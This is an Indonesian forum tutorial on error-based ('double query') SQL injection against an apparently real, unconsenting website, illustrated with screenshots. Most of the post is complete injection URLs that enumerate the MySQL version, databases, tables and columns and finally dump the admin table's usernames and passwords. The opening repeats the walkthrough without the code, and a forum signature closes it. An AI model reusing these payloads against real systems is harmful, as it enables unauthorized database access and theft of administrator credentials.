07-01-2014, 01:36 PM
Assalamualaikum
bertemu lagi dengan saya, kali ini tutorial mengenai double query injection
target sensor yah
http://janda.com/pro.php?id=8
kasih tanda petik dan perhatikan error nya
[hide]
kemudian kita cari version nya dengan perintah
version nya : 5.0.96-log
sekarang cari database nya
hasilnya : information_schema
pada +LIMIT+0,1 kita ubah aja misal 1+1 2+1 dst
database: challanich
sekarang mencari tabel dari database challanich
beruntung langsung ada kata admin
table: ch_admin
sama seperti di atas limit 0+1 bisa di rubah seperti tadi
okay lanjut, sekarang melihat column dari table ch_admin
perhatikan warna merah yah
nah limit nya kitah ubah lagi
jadi kita simpulkan yang penting : user+password
sekarang dump
liat yang berwarna merah
[/hide]
okay sekian dan terima kasih
semoga bermanfaat
bertemu lagi dengan saya, kali ini tutorial mengenai double query injection
target sensor yah
http://janda.com/pro.php?id=8
kasih tanda petik dan perhatikan error nya
[hide]
Spoiler! :
![[Image: 1.jpg]](https://4.bp.blogspot.com/-MUBPBt-1Pm8/U7JBxnODkKI/AAAAAAAAAp8/lfSrqs5Eabg/s1600/1.jpg)
kemudian kita cari version nya dengan perintah
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1Spoiler! :
![[Image: 2.jpg]](https://1.bp.blogspot.com/-xosclFndOd8/U7JDBPSXWEI/AAAAAAAAAqI/Co3ZXkHpypI/s1600/2.jpg)
version nya : 5.0.96-log
sekarang cari database nya
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1Spoiler! :
![[Image: 3.jpg]](https://2.bp.blogspot.com/-2JYpYowkb0Q/U7JDJmGng_I/AAAAAAAAAqQ/AqKQqq7LAU8/s1600/3.jpg)
hasilnya : information_schema
pada +LIMIT+0,1 kita ubah aja misal 1+1 2+1 dst
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+1,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1Spoiler! :
![[Image: 4.jpg]](https://4.bp.blogspot.com/-2BY2NowkRkA/U7JDjTreOCI/AAAAAAAAAqY/JD6qQ3gVumI/s1600/4.jpg)
sekarang mencari tabel dari database challanich
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=0x6368616c6c616e696368+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1Spoiler! :
![[Image: 5.jpg]](https://1.bp.blogspot.com/-CdsEIJ54Qes/U7JD2TyB2bI/AAAAAAAAAqg/Ycnf4IgyfVM/s1600/5.jpg)
beruntung langsung ada kata admin
table: ch_admin
sama seperti di atas limit 0+1 bisa di rubah seperti tadi
okay lanjut, sekarang melihat column dari table ch_admin
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1Spoiler! :
![[Image: 6.jpg]](https://2.bp.blogspot.com/-bK-_y_I71YI/U7JEOsaTicI/AAAAAAAAAqo/oUYMwwSWgQ0/s1600/6.jpg)
perhatikan warna merah yah
nah limit nya kitah ubah lagi
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1= 1Spoiler! :
![[Image: 7.jpg]](https://3.bp.blogspot.com/-HMdHz_VDWCo/U7JEjQUsROI/AAAAAAAAAqw/IS2rwLBVV8U/s1600/7.jpg)
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1Spoiler! :
![[Image: 8.jpg]](https://3.bp.blogspot.com/-rw1As7hm7vk/U7JEyla9A_I/AAAAAAAAAq4/VeBRMv2cGYo/s1600/8.jpg)
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+3,1))+from+information_schema.tables+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1Spoiler! :
![[Image: 9.jpg]](https://1.bp.blogspot.com/---Z6MJaECDc/U7JFWY1OeqI/AAAAAAAAArA/LOsAPM3bGKg/s1600/9.jpg)
jadi kita simpulkan yang penting : user+password
sekarang dump
Code:
janda/pro.php?id=8+and+(select 1 from(select+count(*),concat((select+concat(user,0x3a,password,0x3a) from ch_admin+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1Spoiler! :
![[Image: 10.jpg]](https://3.bp.blogspot.com/-xXinZx_suEg/U7JFySulScI/AAAAAAAAArI/QQnTXrTYGc0/s1600/10.jpg)
okay sekian dan terima kasih
semoga bermanfaat
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
:-
